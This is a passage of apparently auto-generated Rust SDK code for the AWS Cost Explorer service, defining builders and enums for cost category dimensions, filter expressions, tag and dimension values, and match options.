            .field("dimension_name", &self.dimension_name)
            .field("dimension_key", &self.dimension_key)
            .finish()
    }
}
/// See [`CostCategoryInheritedValueDimension`](crate::model::CostCategoryInheritedValueDimension)
pub mod cost_category_inherited_value_dimension {
    /// A builder for [`CostCategoryInheritedValueDimension`](crate::model::CostCategoryInheritedValueDimension)
    #[non_exhaustive]
    #[derive(std::default::Default, std::clone::Clone, std::cmp::PartialEq, std::fmt::Debug)]
    pub struct Builder {
        pub(crate) dimension_name:
            std::option::Option<crate::model::CostCategoryInheritedValueDimensionName>,
        pub(crate) dimension_key: std::option::Option<std::string::String>,
    }
    impl Builder {
        /// <p>The name of the dimension that's used to group costs.</p>
        /// <p>If you specify <code>LINKED_ACCOUNT_NAME</code>, the cost category value is based on
        /// account name. If you specify <code>TAG</code>, the cost category value will be based on
        /// the value of the specified tag key.</p>
        pub fn dimension_name(
            self,
            input: crate::model::CostCategoryInheritedValueDimensionName,
        ) -> Self {
            Self {
                dimension_name: Some(input),
                ..self
            }
        }
        /// Replaces the dimension name with the given optional value.
        pub fn set_dimension_name(
            self,
            input: std::option::Option<crate::model::CostCategoryInheritedValueDimensionName>,
        ) -> Self {
            Self {
                dimension_name: input,
                ..self
            }
        }
        /// <p>The key to extract cost category values.</p>
        pub fn dimension_key(self, input: impl Into<std::string::String>) -> Self {
            Self {
                dimension_key: Some(input.into()),
                ..self
            }
        }
        /// Replaces the dimension key with the given optional value.
        pub fn set_dimension_key(
            self,
            input: std::option::Option<std::string::String>,
        ) -> Self {
            Self {
                dimension_key: input,
                ..self
            }
        }
        /// Consumes the builder and constructs a [`CostCategoryInheritedValueDimension`](crate::model::CostCategoryInheritedValueDimension)
        pub fn build(self) -> crate::model::CostCategoryInheritedValueDimension {
            let Builder {
                dimension_name,
                dimension_key,
            } = self;
            crate::model::CostCategoryInheritedValueDimension {
                dimension_name,
                dimension_key,
            }
        }
    }
}
impl CostCategoryInheritedValueDimension {
    /// Creates a new builder-style object to manufacture [`CostCategoryInheritedValueDimension`](crate::model::CostCategoryInheritedValueDimension)
    pub fn builder() -> crate::model::cost_category_inherited_value_dimension::Builder {
        Default::default()
    }
}
/// The kinds of dimension that an inherited-value cost category rule can read its value from.
#[non_exhaustive]
#[derive(
    std::clone::Clone,
    std::cmp::Eq,
    std::cmp::Ord,
    std::cmp::PartialEq,
    std::cmp::PartialOrd,
    std::fmt::Debug,
    std::hash::Hash,
)]
pub enum CostCategoryInheritedValueDimensionName {
    LinkedAccountName,
    Tag,
    /// Unknown contains new variants that have been added since this code was generated.
    Unknown(String),
}
impl std::convert::From<&str> for CostCategoryInheritedValueDimensionName {
    fn from(s: &str) -> Self {
        // Unrecognized strings are preserved verbatim in `Unknown` so newer
        // service values still round-trip.
        match s {
            "LINKED_ACCOUNT_NAME" => Self::LinkedAccountName,
            "TAG" => Self::Tag,
            other => Self::Unknown(other.to_owned()),
        }
    }
}
impl std::str::FromStr for CostCategoryInheritedValueDimensionName {
    type Err = std::convert::Infallible;
    /// Parsing never fails: any input maps to a variant (possibly `Unknown`).
    fn from_str(s: &str) -> std::result::Result<Self, Self::Err> {
        Ok(s.into())
    }
}
impl CostCategoryInheritedValueDimensionName {
    /// Returns the string form of this value.
    pub fn as_str(&self) -> &str {
        match self {
            Self::LinkedAccountName => "LINKED_ACCOUNT_NAME",
            Self::Tag => "TAG",
            Self::Unknown(value) => value.as_ref(),
        }
    }
    /// Lists every value that was known when this code was generated.
    pub fn values() -> &'static [&'static str] {
        &["LINKED_ACCOUNT_NAME", "TAG"]
    }
}
impl AsRef<str> for CostCategoryInheritedValueDimensionName {
    fn as_ref(&self) -> &str {
        self.as_str()
    }
}
/// <p>Use <code>Expression</code> to filter by cost or by usage. There are two patterns: </p>
/// <ul>
/// <li>
/// <p>Simple dimension values - You can set the dimension name and values for the
/// filters that you plan to use. For example, you can filter for
/// <code>REGION==us-east-1 OR REGION==us-west-1</code>. For
/// <code>GetRightsizingRecommendation</code>, the Region is a full name (for
/// example, <code>REGION==US East (N. Virginia)</code>. The <code>Expression</code>
/// example is as follows:</p>
/// <p>
/// <code>{ "Dimensions": { "Key": "REGION", "Values": [ "us-east-1", “us-west-1” ]
/// } }</code>
/// </p>
/// <p>The list of dimension values are OR'd together to retrieve cost or usage data.
/// You can create <code>Expression</code> and <code>DimensionValues</code> objects
/// using either <code>with*</code> methods or <code>set*</code> methods in multiple
/// lines. </p>
/// </li>
/// <li>
/// <p>Compound dimension values with logical operations - You can use multiple
/// <code>Expression</code> types and the logical operators
/// <code>AND/OR/NOT</code> to create a list of one or more
/// <code>Expression</code> objects. By doing this, you can filter on more
/// advanced options. For example, you can filter on <code>((REGION == us-east-1 OR
/// REGION == us-west-1) OR (TAG.Type == Type1)) AND (USAGE_TYPE !=
/// DataTransfer)</code>. The <code>Expression</code> for that is as
/// follows:</p>
/// <p>
/// <code>{ "And": [ {"Or": [ {"Dimensions": { "Key": "REGION", "Values": [
/// "us-east-1", "us-west-1" ] }}, {"Tags": { "Key": "TagName", "Values":
/// ["Value1"] } } ]}, {"Not": {"Dimensions": { "Key": "USAGE_TYPE", "Values":
/// ["DataTransfer"] }}} ] } </code>
/// </p>
/// <note>
/// <p>Because each <code>Expression</code> can have only one operator, the
/// service returns an error if more than one is specified. The following
/// example shows an <code>Expression</code> object that creates an
/// error.</p>
/// </note>
/// <p>
/// <code> { "And": [ ... ], "DimensionValues": { "Dimension": "USAGE_TYPE",
/// "Values": [ "DataTransfer" ] } } </code>
/// </p>
/// </li>
/// </ul>
/// <note>
/// <p>For the <code>GetRightsizingRecommendation</code> action, a combination of OR and
/// NOT isn't supported. OR isn't supported between different dimensions, or dimensions
/// and tags. NOT operators aren't supported. Dimensions are also limited to
/// <code>LINKED_ACCOUNT</code>, <code>REGION</code>, or
/// <code>RIGHTSIZING_TYPE</code>.</p>
/// <p>For the <code>GetReservationPurchaseRecommendation</code> action, only NOT is
/// supported. AND and OR aren't supported. Dimensions are limited to
/// <code>LINKED_ACCOUNT</code>.</p>
/// </note>
#[non_exhaustive]
#[derive(std::clone::Clone, std::cmp::PartialEq)]
pub struct Expression {
    /// <p>Return results that match either <code>Dimension</code> object.</p>
    pub or: std::option::Option<std::vec::Vec<crate::model::Expression>>,
    /// <p>Return results that match both <code>Dimension</code> objects.</p>
    pub and: std::option::Option<std::vec::Vec<crate::model::Expression>>,
    /// <p>Return results that don't match a <code>Dimension</code> object.</p>
    pub not: std::option::Option<std::boxed::Box<crate::model::Expression>>,
    /// <p>The specific <code>Dimension</code> to use for <code>Expression</code>.</p>
    pub dimensions: std::option::Option<crate::model::DimensionValues>,
    /// <p>The specific <code>Tag</code> to use for <code>Expression</code>.</p>
    pub tags: std::option::Option<crate::model::TagValues>,
    /// <p>The filter that's based on <code>CostCategory</code> values.</p>
    pub cost_categories: std::option::Option<crate::model::CostCategoryValues>,
}
impl std::fmt::Debug for Expression {
    fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
        // Chained debug-struct builder; renders the same output as the
        // statement-per-field form.
        f.debug_struct("Expression")
            .field("or", &self.or)
            .field("and", &self.and)
            .field("not", &self.not)
            .field("dimensions", &self.dimensions)
            .field("tags", &self.tags)
            .field("cost_categories", &self.cost_categories)
            .finish()
    }
}
/// See [`Expression`](crate::model::Expression)
pub mod expression {
    /// A builder for [`Expression`](crate::model::Expression)
    #[non_exhaustive]
    #[derive(std::default::Default, std::clone::Clone, std::cmp::PartialEq, std::fmt::Debug)]
    pub struct Builder {
        pub(crate) or: std::option::Option<std::vec::Vec<crate::model::Expression>>,
        pub(crate) and: std::option::Option<std::vec::Vec<crate::model::Expression>>,
        pub(crate) not: std::option::Option<std::boxed::Box<crate::model::Expression>>,
        pub(crate) dimensions: std::option::Option<crate::model::DimensionValues>,
        pub(crate) tags: std::option::Option<crate::model::TagValues>,
        pub(crate) cost_categories: std::option::Option<crate::model::CostCategoryValues>,
    }
    impl Builder {
        /// Appends one sub-expression to the `Or` list, creating the list on first use.
        pub fn or(mut self, input: impl Into<crate::model::Expression>) -> Self {
            self.or.get_or_insert_with(Vec::new).push(input.into());
            self
        }
        /// Replaces the whole `Or` list.
        pub fn set_or(
            self,
            input: std::option::Option<std::vec::Vec<crate::model::Expression>>,
        ) -> Self {
            Self { or: input, ..self }
        }
        /// Appends one sub-expression to the `And` list, creating the list on first use.
        pub fn and(mut self, input: impl Into<crate::model::Expression>) -> Self {
            self.and.get_or_insert_with(Vec::new).push(input.into());
            self
        }
        /// Replaces the whole `And` list.
        pub fn set_and(
            self,
            input: std::option::Option<std::vec::Vec<crate::model::Expression>>,
        ) -> Self {
            Self { and: input, ..self }
        }
        /// <p>Return results that don't match a <code>Dimension</code> object.</p>
        pub fn not(self, input: impl Into<std::boxed::Box<crate::model::Expression>>) -> Self {
            Self {
                not: Some(input.into()),
                ..self
            }
        }
        /// Replaces the `Not` sub-expression with the given optional value.
        pub fn set_not(
            self,
            input: std::option::Option<std::boxed::Box<crate::model::Expression>>,
        ) -> Self {
            Self { not: input, ..self }
        }
        /// <p>The specific <code>Dimension</code> to use for <code>Expression</code>.</p>
        pub fn dimensions(self, input: crate::model::DimensionValues) -> Self {
            Self {
                dimensions: Some(input),
                ..self
            }
        }
        /// Replaces the dimension filter with the given optional value.
        pub fn set_dimensions(
            self,
            input: std::option::Option<crate::model::DimensionValues>,
        ) -> Self {
            Self {
                dimensions: input,
                ..self
            }
        }
        /// <p>The specific <code>Tag</code> to use for <code>Expression</code>.</p>
        pub fn tags(self, input: crate::model::TagValues) -> Self {
            Self {
                tags: Some(input),
                ..self
            }
        }
        /// Replaces the tag filter with the given optional value.
        pub fn set_tags(self, input: std::option::Option<crate::model::TagValues>) -> Self {
            Self { tags: input, ..self }
        }
        /// <p>The filter that's based on <code>CostCategory</code> values.</p>
        pub fn cost_categories(self, input: crate::model::CostCategoryValues) -> Self {
            Self {
                cost_categories: Some(input),
                ..self
            }
        }
        /// Replaces the cost category filter with the given optional value.
        pub fn set_cost_categories(
            self,
            input: std::option::Option<crate::model::CostCategoryValues>,
        ) -> Self {
            Self {
                cost_categories: input,
                ..self
            }
        }
        /// Consumes the builder and constructs a [`Expression`](crate::model::Expression)
        pub fn build(self) -> crate::model::Expression {
            let Builder {
                or,
                and,
                not,
                dimensions,
                tags,
                cost_categories,
            } = self;
            crate::model::Expression {
                or,
                and,
                not,
                dimensions,
                tags,
                cost_categories,
            }
        }
    }
}
impl Expression {
    /// Creates a new builder-style object to manufacture [`Expression`](crate::model::Expression)
    pub fn builder() -> crate::model::expression::Builder {
        Default::default()
    }
}
/// <p>The Cost Categories values used for filtering the costs.</p>
/// <p>If <code>Values</code> and <code>Key</code> are not specified, the <code>ABSENT</code>
/// <code>MatchOption</code> is applied to all Cost Categories. That is, it filters on
/// resources that aren't mapped to any Cost Categories.</p>
/// <p>If <code>Values</code> is provided and <code>Key</code> isn't specified, the
/// <code>ABSENT</code>
/// <code>MatchOption</code> is applied to the Cost Categories <code>Key</code> only. That
/// is, it filters on resources without the given Cost Categories key.</p>
#[non_exhaustive]
#[derive(std::clone::Clone, std::cmp::PartialEq)]
pub struct CostCategoryValues {
    /// <p>The unique name of the Cost Category.</p>
    pub key: std::option::Option<std::string::String>,
    /// <p>The specific value of the Cost Category.</p>
    pub values: std::option::Option<std::vec::Vec<std::string::String>>,
    /// <p>The match options that you can use to filter your results. MatchOptions is only
    /// applicable for actions related to cost category. The default values for
    /// <code>MatchOptions</code> is <code>EQUALS</code> and <code>CASE_SENSITIVE</code>.
    /// </p>
    pub match_options: std::option::Option<std::vec::Vec<crate::model::MatchOption>>,
}
impl std::fmt::Debug for CostCategoryValues {
    fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
        // Chained debug-struct builder; renders the same output as the
        // statement-per-field form.
        f.debug_struct("CostCategoryValues")
            .field("key", &self.key)
            .field("values", &self.values)
            .field("match_options", &self.match_options)
            .finish()
    }
}
/// See [`CostCategoryValues`](crate::model::CostCategoryValues)
pub mod cost_category_values {
    /// A builder for [`CostCategoryValues`](crate::model::CostCategoryValues)
    #[non_exhaustive]
    #[derive(std::default::Default, std::clone::Clone, std::cmp::PartialEq, std::fmt::Debug)]
    pub struct Builder {
        pub(crate) key: std::option::Option<std::string::String>,
        pub(crate) values: std::option::Option<std::vec::Vec<std::string::String>>,
        pub(crate) match_options: std::option::Option<std::vec::Vec<crate::model::MatchOption>>,
    }
    impl Builder {
        /// <p>The unique name of the Cost Category.</p>
        pub fn key(self, input: impl Into<std::string::String>) -> Self {
            Self {
                key: Some(input.into()),
                ..self
            }
        }
        /// Replaces the key with the given optional value.
        pub fn set_key(self, input: std::option::Option<std::string::String>) -> Self {
            Self { key: input, ..self }
        }
        /// Appends one Cost Category value, creating the list on first use.
        pub fn values(mut self, input: impl Into<std::string::String>) -> Self {
            self.values.get_or_insert_with(Vec::new).push(input.into());
            self
        }
        /// Replaces the whole list of values.
        pub fn set_values(
            self,
            input: std::option::Option<std::vec::Vec<std::string::String>>,
        ) -> Self {
            Self {
                values: input,
                ..self
            }
        }
        /// Appends one match option, creating the list on first use.
        pub fn match_options(mut self, input: impl Into<crate::model::MatchOption>) -> Self {
            self.match_options
                .get_or_insert_with(Vec::new)
                .push(input.into());
            self
        }
        /// Replaces the whole list of match options.
        pub fn set_match_options(
            self,
            input: std::option::Option<std::vec::Vec<crate::model::MatchOption>>,
        ) -> Self {
            Self {
                match_options: input,
                ..self
            }
        }
        /// Consumes the builder and constructs a [`CostCategoryValues`](crate::model::CostCategoryValues)
        pub fn build(self) -> crate::model::CostCategoryValues {
            let Builder {
                key,
                values,
                match_options,
            } = self;
            crate::model::CostCategoryValues {
                key,
                values,
                match_options,
            }
        }
    }
}
impl CostCategoryValues {
    /// Creates a new builder-style object to manufacture [`CostCategoryValues`](crate::model::CostCategoryValues)
    pub fn builder() -> crate::model::cost_category_values::Builder {
        Default::default()
    }
}
/// The comparison modes available when matching filter values (used by the
/// `match_options` fields of the value filters in this module).
#[non_exhaustive]
#[derive(
    std::clone::Clone,
    std::cmp::Eq,
    std::cmp::Ord,
    std::cmp::PartialEq,
    std::cmp::PartialOrd,
    std::fmt::Debug,
    std::hash::Hash,
)]
pub enum MatchOption {
    Absent,
    CaseInsensitive,
    CaseSensitive,
    Contains,
    EndsWith,
    Equals,
    StartsWith,
    /// Unknown contains new variants that have been added since this code was generated.
    Unknown(String),
}
impl std::convert::From<&str> for MatchOption {
    fn from(s: &str) -> Self {
        // Unrecognized strings are preserved verbatim in `Unknown` so newer
        // service values still round-trip.
        match s {
            "ABSENT" => Self::Absent,
            "CASE_INSENSITIVE" => Self::CaseInsensitive,
            "CASE_SENSITIVE" => Self::CaseSensitive,
            "CONTAINS" => Self::Contains,
            "ENDS_WITH" => Self::EndsWith,
            "EQUALS" => Self::Equals,
            "STARTS_WITH" => Self::StartsWith,
            other => Self::Unknown(other.to_owned()),
        }
    }
}
impl std::str::FromStr for MatchOption {
    type Err = std::convert::Infallible;
    /// Parsing never fails: any input maps to a variant (possibly `Unknown`).
    fn from_str(s: &str) -> std::result::Result<Self, Self::Err> {
        Ok(s.into())
    }
}
impl MatchOption {
    /// Returns the string form of this value.
    pub fn as_str(&self) -> &str {
        match self {
            Self::Absent => "ABSENT",
            Self::CaseInsensitive => "CASE_INSENSITIVE",
            Self::CaseSensitive => "CASE_SENSITIVE",
            Self::Contains => "CONTAINS",
            Self::EndsWith => "ENDS_WITH",
            Self::Equals => "EQUALS",
            Self::StartsWith => "STARTS_WITH",
            Self::Unknown(value) => value.as_ref(),
        }
    }
    /// Lists every value that was known when this code was generated.
    pub fn values() -> &'static [&'static str] {
        &[
            "ABSENT",
            "CASE_INSENSITIVE",
            "CASE_SENSITIVE",
            "CONTAINS",
            "ENDS_WITH",
            "EQUALS",
            "STARTS_WITH",
        ]
    }
}
impl AsRef<str> for MatchOption {
    fn as_ref(&self) -> &str {
        self.as_str()
    }
}
/// <p>The values that are available for a tag.</p>
/// <p>If <code>Values</code> and <code>Key</code> aren't specified, the <code>ABSENT</code>
/// <code>MatchOption</code> is applied to all tags. That is, it's filtered on resources
/// with no tags.</p>
/// <p>If <code>Values</code> is provided and <code>Key</code> isn't specified, the
/// <code>ABSENT</code>
/// <code>MatchOption</code> is applied to the tag <code>Key</code> only. That is, it's
/// filtered on resources without the given tag key.</p>
#[non_exhaustive]
#[derive(std::clone::Clone, std::cmp::PartialEq)]
pub struct TagValues {
    /// <p>The key for the tag.</p>
    pub key: std::option::Option<std::string::String>,
    /// <p>The specific value of the tag.</p>
    pub values: std::option::Option<std::vec::Vec<std::string::String>>,
    /// <p>The match options that you can use to filter your results. <code>MatchOptions</code>
    /// is only applicable for actions related to Cost Category. The default values for
    /// <code>MatchOptions</code> are <code>EQUALS</code> and
    /// <code>CASE_SENSITIVE</code>.</p>
    pub match_options: std::option::Option<std::vec::Vec<crate::model::MatchOption>>,
}
impl std::fmt::Debug for TagValues {
    fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
        // Chained debug-struct builder; renders the same output as the
        // statement-per-field form.
        f.debug_struct("TagValues")
            .field("key", &self.key)
            .field("values", &self.values)
            .field("match_options", &self.match_options)
            .finish()
    }
}
/// See [`TagValues`](crate::model::TagValues)
pub mod tag_values {
    /// A builder for [`TagValues`](crate::model::TagValues)
    #[non_exhaustive]
    #[derive(std::default::Default, std::clone::Clone, std::cmp::PartialEq, std::fmt::Debug)]
    pub struct Builder {
        pub(crate) key: std::option::Option<std::string::String>,
        pub(crate) values: std::option::Option<std::vec::Vec<std::string::String>>,
        pub(crate) match_options: std::option::Option<std::vec::Vec<crate::model::MatchOption>>,
    }
    impl Builder {
        /// <p>The key for the tag.</p>
        pub fn key(self, input: impl Into<std::string::String>) -> Self {
            Self {
                key: Some(input.into()),
                ..self
            }
        }
        /// Replaces the tag key with the given optional value.
        pub fn set_key(self, input: std::option::Option<std::string::String>) -> Self {
            Self { key: input, ..self }
        }
        /// Appends one tag value, creating the list on first use.
        pub fn values(mut self, input: impl Into<std::string::String>) -> Self {
            self.values.get_or_insert_with(Vec::new).push(input.into());
            self
        }
        /// Replaces the whole list of tag values.
        pub fn set_values(
            self,
            input: std::option::Option<std::vec::Vec<std::string::String>>,
        ) -> Self {
            Self {
                values: input,
                ..self
            }
        }
        /// Appends one match option, creating the list on first use.
        pub fn match_options(mut self, input: impl Into<crate::model::MatchOption>) -> Self {
            self.match_options
                .get_or_insert_with(Vec::new)
                .push(input.into());
            self
        }
        /// Replaces the whole list of match options.
        pub fn set_match_options(
            self,
            input: std::option::Option<std::vec::Vec<crate::model::MatchOption>>,
        ) -> Self {
            Self {
                match_options: input,
                ..self
            }
        }
        /// Consumes the builder and constructs a [`TagValues`](crate::model::TagValues)
        pub fn build(self) -> crate::model::TagValues {
            let Builder {
                key,
                values,
                match_options,
            } = self;
            crate::model::TagValues {
                key,
                values,
                match_options,
            }
        }
    }
}
impl TagValues {
    /// Creates a new builder-style object to manufacture [`TagValues`](crate::model::TagValues)
    pub fn builder() -> crate::model::tag_values::Builder {
        Default::default()
    }
}
/// <p>The metadata that you can use to filter and group your results. You can use
/// <code>GetDimensionValues</code> to find specific values.</p>
#[non_exhaustive]
#[derive(std::clone::Clone, std::cmp::PartialEq)]
pub struct DimensionValues {
    /// <p>The names of the metadata types that you can use to filter and group your results. For
    /// example, <code>AZ</code> returns a list of Availability Zones.</p>
    pub key: std::option::Option<crate::model::Dimension>,
    /// <p>The metadata values that you can use to filter and group your results. You can use
    /// <code>GetDimensionValues</code> to find specific values.</p>
    pub values: std::option::Option<std::vec::Vec<std::string::String>>,
    /// <p>The match options that you can use to filter your results. <code>MatchOptions</code>
    /// is only applicable for actions related to Cost Category. The default values for
    /// <code>MatchOptions</code> are <code>EQUALS</code> and
    /// <code>CASE_SENSITIVE</code>.</p>
    pub match_options: std::option::Option<std::vec::Vec<crate::model::MatchOption>>,
}
impl std::fmt::Debug for DimensionValues {
    fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
        // Chained debug-struct builder; renders the same output as the
        // statement-per-field form.
        f.debug_struct("DimensionValues")
            .field("key", &self.key)
            .field("values", &self.values)
            .field("match_options", &self.match_options)
            .finish()
    }
}
/// See [`DimensionValues`](crate::model::DimensionValues)
pub mod dimension_values {
    /// A builder for [`DimensionValues`](crate::model::DimensionValues)
    #[non_exhaustive]
    #[derive(std::default::Default, std::clone::Clone, std::cmp::PartialEq, std::fmt::Debug)]
    pub struct Builder {
        pub(crate) key: std::option::Option<crate::model::Dimension>,
        pub(crate) values: std::option::Option<std::vec::Vec<std::string::String>>,
        pub(crate) match_options: std::option::Option<std::vec::Vec<crate::model::MatchOption>>,
    }
    impl Builder {
        /// <p>The names of the metadata types that you can use to filter and group your results. For
        /// example, <code>AZ</code> returns a list of Availability Zones.</p>
        pub fn key(self, input: crate::model::Dimension) -> Self {
            Self {
                key: Some(input),
                ..self
            }
        }
        /// Replaces the dimension key with the given optional value.
        pub fn set_key(self, input: std::option::Option<crate::model::Dimension>) -> Self {
            Self { key: input, ..self }
        }
        /// Appends one dimension value, creating the list on first use.
        pub fn values(mut self, input: impl Into<std::string::String>) -> Self {
            self.values.get_or_insert_with(Vec::new).push(input.into());
            self
        }
        /// Replaces the whole list of dimension values.
        pub fn set_values(
            self,
            input: std::option::Option<std::vec::Vec<std::string::String>>,
        ) -> Self {
            Self {
                values: input,
                ..self
            }
        }
        /// Appends one match option, creating the list on first use.
        pub fn match_options(mut self, input: impl Into<crate::model::MatchOption>) -> Self {
            self.match_options
                .get_or_insert_with(Vec::new)
                .push(input.into());
            self
        }
        /// Replaces the whole list of match options.
        pub fn set_match_options(
            self,
            input: std::option::Option<std::vec::Vec<crate::model::MatchOption>>,
        ) -> Self {
            Self {
                match_options: input,
                ..self
            }
        }
        /// Consumes the builder and constructs a [`DimensionValues`](crate::model::DimensionValues)
        pub fn build(self) -> crate::model::DimensionValues {
            let Builder {
                key,
                values,
                match_options,
            } = self;
            crate::model::DimensionValues {
                key,
                values,
                match_options,
            }
        }
    }
}
impl DimensionValues {
    /// Creates a new builder-style object to manufacture [`DimensionValues`](crate::model::DimensionValues)
    pub fn builder() -> crate::model::dimension_values::Builder {
        Default::default()
    }
}
/// The dimension keys available for filtering and grouping; this is the type of
/// [`DimensionValues::key`](crate::model::DimensionValues).
#[non_exhaustive]
#[derive(
    std::clone::Clone,
    std::cmp::Eq,
    std::cmp::Ord,
    std::cmp::PartialEq,
    std::cmp::PartialOrd,
    std::fmt::Debug,
    std::hash::Hash,
)]
pub enum Dimension {
    AgreementEndDateTimeAfter,
    AgreementEndDateTimeBefore,
    Az,
    BillingEntity,
    CacheEngine,
    DatabaseEngine,
    DeploymentOption,
    InstanceType,
    InstanceTypeFamily,
    LegalEntityName,
    LinkedAccount,
    LinkedAccountName,
    OperatingSystem,
    Operation,
    PaymentOption,
    Platform,
    PurchaseType,
    RecordType,
    Region,
    ReservationId,
    ResourceId,
    RightsizingType,
    SavingsPlansType,
    SavingsPlanArn,
    Scope,
    Service,
    ServiceCode,
    SubscriptionId,
    Tenancy,
    UsageType,
    UsageTypeGroup,
    /// Unknown contains new variants that have been added since this code was generated.
    Unknown(String),
}
// Conversion from the string form; unrecognized values are preserved verbatim
// in `Unknown` so newer service values still round-trip.
impl std::convert::From<&str> for Dimension {
    fn from(s: &str) -> Self {
        match s {
            "AGREEMENT_END_DATE_TIME_AFTER" => Dimension::AgreementEndDateTimeAfter,
            "AGREEMENT_END_DATE_TIME_BEFORE" => Dimension::AgreementEndDateTimeBefore,
            "AZ" => Dimension::Az,
            "BILLING_ENTITY" => Dimension::BillingEntity,
            "CACHE_ENGINE" => Dimension::CacheEngine,
            "DATABASE_ENGINE" => Dimension::DatabaseEngine,
            "DEPLOYMENT_OPTION" => Dimension::DeploymentOption,
            "INSTANCE_TYPE" => Dimension::InstanceType,
            "INSTANCE_TYPE_FAMILY" => Dimension::InstanceTypeFamily,
            "LEGAL_ENTITY_NAME" => Dimension::LegalEntityName,
            "LINKED_ACCOUNT" => Dimension::LinkedAccount,
            "LINKED_ACCOUNT_NAME" => Dimension::LinkedAccountName,
            "OPERATING_SYSTEM" => Dimension::OperatingSystem,
            "OPERATION" => Dimension::Operation,
            "PAYMENT_OPTION" => Dimension::PaymentOption,
            "PLATFORM" => Dimension::Platform,
            "PURCHASE_TYPE" => Dimension::PurchaseType,
            "RECORD_TYPE" => Dimension::RecordType,
            "REGION" => Dimension::Region,
            "RESERVATION_ID" => Dimension::ReservationId,
            "RESOURCE_ID" => Dimension::ResourceId,
            "RIGHTSIZING_TYPE" => Dimension::RightsizingType,
            "SAVINGS_PLANS_TYPE" => Dimension::SavingsPlansType,
            "SAVINGS_PLAN_ARN" => Dimension::SavingsPlanArn,
            "SCOPE" => Dimension::Scope,
            "SERVICE" => Dimension::Service,
            "SERVICE_CODE" => Dimension::ServiceCode,
            "SUBSCRIPTION_ID" => Dimension::SubscriptionId,
            "TENANCY" => Dimension::Tenancy,
            "USAGE_TYPE" => Dimension::UsageType,
            "USAGE_TYPE_GROUP" => Dimension::UsageTypeGroup,
            other => Dimension::Unknown(other.to_owned()),
        }
    }
}
// Infallible parsing: any string maps to a variant (possibly `Unknown`).
impl std::str::FromStr for Dimension {
    type Err = std::convert::Infallible;
    fn from_str(s: &str) -> std::result::Result<Self, Self::Err> {
        Ok(Dimension::from(s))
    }
}
impl Dimension {
    /// Returns the string form of this value (the inverse of `From<&str>` for
    /// all variants except `Unknown`, which echoes its stored string).
    pub fn as_str(&self) -> &str {
        match self {
            Dimension::AgreementEndDateTimeAfter => "AGREEMENT_END_DATE_TIME_AFTER",
            Dimension::AgreementEndDateTimeBefore => "AGREEMENT_END_DATE_TIME_BEFORE",
            Dimension::Az => "AZ",
            Dimension::BillingEntity => "BILLING_ENTITY",
            Dimension::CacheEngine => "CACHE_ENGINE",
            Dimension::DatabaseEngine => "DATABASE_ENGINE",
            Dimension::DeploymentOption => "DEPLOYMENT_OPTION",
            Dimension::InstanceType => "INSTANCE_TYPE",
            Dimension::InstanceTypeFamily => "INSTANCE_TYPE_FAMILY",
            Dimension::LegalEntityName => "LEGAL_ENTITY_NAME",
            Dimension::LinkedAccount => "LINKED_ACCOUNT",
            Dimension::LinkedAccountName => "LINKED_ACCOUNT_NAME",
            Dimension::OperatingSystem => "OPERATING_SYSTEM",
            Dimension::Operation => "OPERATION",
            Dimension::PaymentOption => "PAYMENT_OPTION",
            Dimension::Platform => "PLATFORM",
            Dimension::PurchaseType => "PURCHASE_TYPE",
            Dimension::RecordType => "RECORD_TYPE",
            Dimension::Region => "REGION",
            Dimension::ReservationId => "RESERVATION_ID",
            Dimension::ResourceId => "RESOURCE_ID",
            Dimension::RightsizingType => "RIGHTSIZING_TYPE",
            Dimension::SavingsPlansType => "SAVINGS_PLANS_TYPE",
            Dimension::SavingsPlanArn => "SAVINGS_PLAN_ARN",
            Dimension::Scope => "SCOPE",
            Dimension::Service => "SERVICE",
            Dimension::ServiceCode => "SERVICE_CODE",
            Dimension::SubscriptionId => "SUBSCRIPTION_ID",
            Dimension::Tenancy => "TENANCY",
            Dimension::UsageType => "USAGE_TYPE",
            Dimension::UsageTypeGroup => "USAGE_TYPE_GROUP",
            Dimension::Unknown(s) => s.as_ref(),
        }
    }
    /// Lists every value that was known when this code was generated (values
    /// carried by `Unknown` are not included).
    pub fn values() -> &'static [&'static str] {
        &[
            "AGREEMENT_END_DATE_TIME_AFTER",
            "AGREEMENT_END_DATE_TIME_BEFORE",
            "AZ",
            "BILLING_ENTITY",
            "CACHE_ENGINE",
            "DATABASE_ENGINE",
            "DEPLOYMENT_OPTION",
            "INSTANCE_TYPE",
            "INSTANCE_TYPE_FAMILY",
            "LEGAL_ENTITY_NAME",
            "LINKED_ACCOUNT",
            "LINKED_ACCOUNT_NAME",
            "OPERATING_SYSTEM",
            "OPERATION",
            "PAYMENT_OPTION",
            "PLATFORM",
            "PURCHASE_TYPE",
            "RECORD_TYPE",
            "REGION",
            "RESERVATION_ID",
            "RESOURCE_ID",
            "RIGHTSIZING_TYPE",
            "SAVINGS_PLANS_TYPE",
            "SAVINGS_PLAN_ARN",
            "SCOPE",
            "SERVICE",
            "SERVICE_CODE",
            "SUBSCRIPTION_ID",
            "TENANCY",
            "USAGE_TYPE",
            "USAGE_TYPE_GROUP",
        ]
    }
}
impl AsRef<str> for Dimension {
    fn as_ref(&self) -> &str {
        self.as_str()
    }
}
/// <p>The rule schema version in this particular Cost Category.</p>
#[non_exhaustive]
#[derive(
    std::clone::Clone,
    std::cmp::Eq,
    std::cmp::Ord,
    std::cmp::PartialEq,
    std::cmp::PartialOrd,
    std::fmt::Debug,
    std::hash::Hash,
)]
pub enum CostCategoryRuleVersion {
    CostCategoryExpressionV1,
    /// Unknown contains new variants that have been added since this code was generated.
    Unknown(String),
}
impl std::convert::From<&str> for CostCategoryRuleVersion {
    fn from(s: &str) -> Self {
        // Only one schema version is known; anything else is preserved in
        // `Unknown` so newer service values still round-trip.
        if s == "CostCategoryExpression.v1" {
            Self::CostCategoryExpressionV1
        } else {
            Self::Unknown(s.to_owned())
        }
    }
}
impl std::str::FromStr for CostCategoryRuleVersion {
    type Err = std::convert::Infallible;
    /// Parsing never fails: any input maps to a variant (possibly `Unknown`).
    fn from_str(s: &str) -> std::result::Result<Self, Self::Err> {
        Ok(s.into())
    }
}
impl CostCategoryRuleVersion {
    /// Returns the string form of this value.
    pub fn as_str(&self) -> &str {
        match self {
            Self::CostCategoryExpressionV1 => "CostCategoryExpression.v1",
            Self::Unknown(value) => value.as_ref(),
        }
    }
    /// Lists every value that was known when this code was generated.
